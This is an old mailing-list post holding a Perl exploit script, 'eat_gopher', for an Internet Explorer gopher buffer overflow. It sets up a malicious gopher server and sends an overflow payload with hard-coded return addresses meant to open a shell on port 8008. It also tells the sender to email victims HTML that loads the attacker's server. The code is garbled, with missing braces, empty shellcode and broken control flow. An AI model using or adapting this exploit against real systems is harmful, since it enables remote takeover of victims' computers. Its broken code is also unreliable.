Updated version of eat gopher...
with minor fix...

visit http://monkey.org/~mat for latest verrsion..
# 2002.7.27
# IE gopher buffer overflow exploit
# only tested with my W2k Korean and Wme Korean windows OS...
# you maybe have to change some addresses with your installations...
my $w2k_sp2_kor="w2k_sp2_kor";
my $w2k_kor="w2k_kor";
my $wme_kor="wme_kor";

#choose which OS this script will support(?)
my $os_str=$wme_kor;

#for w2k_sp2_kor
#shellcode from Deepzone.com
# portshell on 8008
# (LoadLibrary: 40100c GetProcAddress: 401000)

#for w2k_me
#shellcode from Deepzone.com
# portshell on 8008
# (LoadLibrary: 4011F4 GetProcAddress: 401204)

#shellcode below is not so portable
#hard coded LoadLibrary and GetProcAddress Address...
#for w2k

printf "Starting eat_gopher[IE gopher BOF exploit]...\r\n";
printf " <mat\@monkey.org>\r\n";
printf " Send target mail with html like this:
<img src=gopher://<ipaddress>:7070/11/%09%09%2b>
Are you gopher?
I am eat_gopher!

require 5.002;
use strict;
use Socket;
use Carp;

sub spawn;
sub send_gopher_plus_exploit_reply;

my $port=7070;
my $proto=getprotobyname('tcp');
socket(Server,PF_INET,SOCK_STREAM,$proto) || die "socket: $!";
setsockopt(Server,SOL_SOCKET,SO_REUSEADDR,pack("l",1)) || die "setsockopt: $!";
bind(Server,sockaddr_in($port,INADDR_ANY)) || die "bind: $!";
listen(Server,SOMAXCONN) || die "listen: $!";

printf "Listening on $port...\n";

my $waitedpid=0;
my $paddr;

sub REAPER {

for($waitedpid=0;($paddr=accept(Client,Server))||$waitedpid;$waitedpid=0,close Client)
        next if $waitedpid and not $paddr;
        my ($port,$iaddr)=sockaddr_in($paddr);
        my $addr_str=inet_ntoa($iaddr);
        my $name=gethostbyaddr($iaddr,AF_INET);
        printf "got connection: $name: $addr_str\n";

        spawn sub{

sub spawn {
        my $coderef=shift;
        unless(@_ == 0 && $coderef && ref($coderef) eq 'CODE'){
                printf "what the hell??\n";
                confess "usage: spawn CODEREF";
        my $pid;
                return; #parent
        open(STDIN,"<&Client") || die "can't dup client to stdin";
        open(STDOUT,">&Client") || die "can't dup client to stdout";
        exit &$coderef();

sub send_gopher_plus_exploit_reply
        my $send_buffer="+-2\r\n+INFO: 1helllo\tyou\thohst\t70\t+\r\n+ADMIN:\r\nAdmin: 
mat <mat\@monkey.org>\r\nMod-Date: August 15,1992 <19920815185503>\r\n+VIEWS:\r\n%s 
<hi>\r\n+ABSTRACT:\r\nThe shellcode:%s";
        #my $send_buffer="+-2\r\n+INFO: 1t\they\thost\t70\t+\r\n+VIEWS:\r\n%s 

        my $fillup_str1="A"x216;
        my $ool_flag=pack("L",0x00000001); #not matters(for testing)
        my $fillup_str2="A"x8;
        my $get_line_ret=pack("L",0x00002F65); #not matters(for testing)
        my $end_part="C"x12;

        #call esp(FF E4)
        #our code jumps to esp
        my $retaddr;
        if($os_str eq $w2k_sp2_kor || $os_str eq $w2k_kor)
                $retaddr=pack("L",0x70426e70); #w2k SP2 Korean Version
        }elsif($os_str eq $wme_kor)
                $retaddr=pack("L",0x75ff875b); #wme Korean Version

        my $additional_str="X"x8;

        my $bootcode=""; #go to the shellcode position! by looking up a variable in 
the stack(which is hMemHandle) and following the structure... This is caused by the 
gopher code can't process more than 1024 bytes in a line.
        if($os_str eq $w2k_sp2_kor)
  # in sometime this code can't be used~
# this works always..
        }elsif($os_str eq $w2k_kor)
        }elsif($os_str eq $wme_kor)
        my $exploit_str="$fillup_str$retaddr$additional_str$bootcode";

        my $shellcode="";
        if($os_str eq $w2k_sp2_kor || $os_str eq $w2k_kor)
        }elsif($os_str eq $wme_kor)
        printf $send_buffer,$exploit_str,$shellcode;

Reply via email to